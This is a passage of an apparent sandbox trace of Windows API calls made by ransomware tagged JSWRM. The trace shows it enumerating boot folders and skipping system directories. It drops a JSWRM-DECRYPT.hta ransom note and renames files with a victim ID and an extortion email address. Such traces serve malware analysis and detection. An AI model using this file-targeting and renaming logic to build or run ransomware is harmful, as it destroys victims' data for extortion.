CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.705] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.705] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.705] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.705] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.705] CloseHandle (hObject=0xffffffff) returned 1 [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0063.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0063.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0063.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2265b0 [0063.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0063.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0063.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2265b0 | out: hHeap=0x1e0000) returned 1 [0063.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.706] MoveFileW (lpExistingFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\de-DE\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0063.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.706] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.706] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0063.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0063.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.711] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="el-GR", cAlternateFileName="")) returned 1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2=".") returned 1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="..") returned 1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="...") returned 1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="windows") returned -1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="recovery") returned -1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="perflogs") returned -1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="documents and settings") returned 1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="$RECYCLE.BIN") returned 1 [0063.711] lstrcmpiW (lpString1="el-GR", lpString2="system volume information") returned -1 [0063.712] lstrcmpiW (lpString1="el-GR", lpString2="msocache") returned -1 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2370d8 [0063.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.712] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\el-gr\\jswrm-decrypt.hta")) returned 0xffffffff [0063.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2370d8 | out: hHeap=0x1e0000) returned 1 [0063.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0063.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.712] CreateFileW (lpFileName="C:\\Boot\\el-GR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\el-gr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.713] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.713] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.713] CloseHandle (hObject=0x450) returned 1 [0063.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0063.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2370d8 [0063.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.715] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\el-gr\\jswrm-decrypt.hta")) returned 0x20 [0063.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2370d8 | out: hHeap=0x1e0000) returned 1 [0063.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.715] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1ca39084, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0063.715] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.715] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1ca39084, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.715] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.716] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.716] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.716] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0063.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0063.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.716] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.716] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.716] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.717] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.717] CloseHandle (hObject=0xffffffff) returned 1 [0063.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0063.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0063.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0063.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225d30 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0063.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225d30 | out: hHeap=0x1e0000) returned 1 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.718] MoveFileW (lpExistingFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.718] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca39084, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ca39084, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ca39084, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.718] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0063.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0063.719] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.719] lstrcmpiW 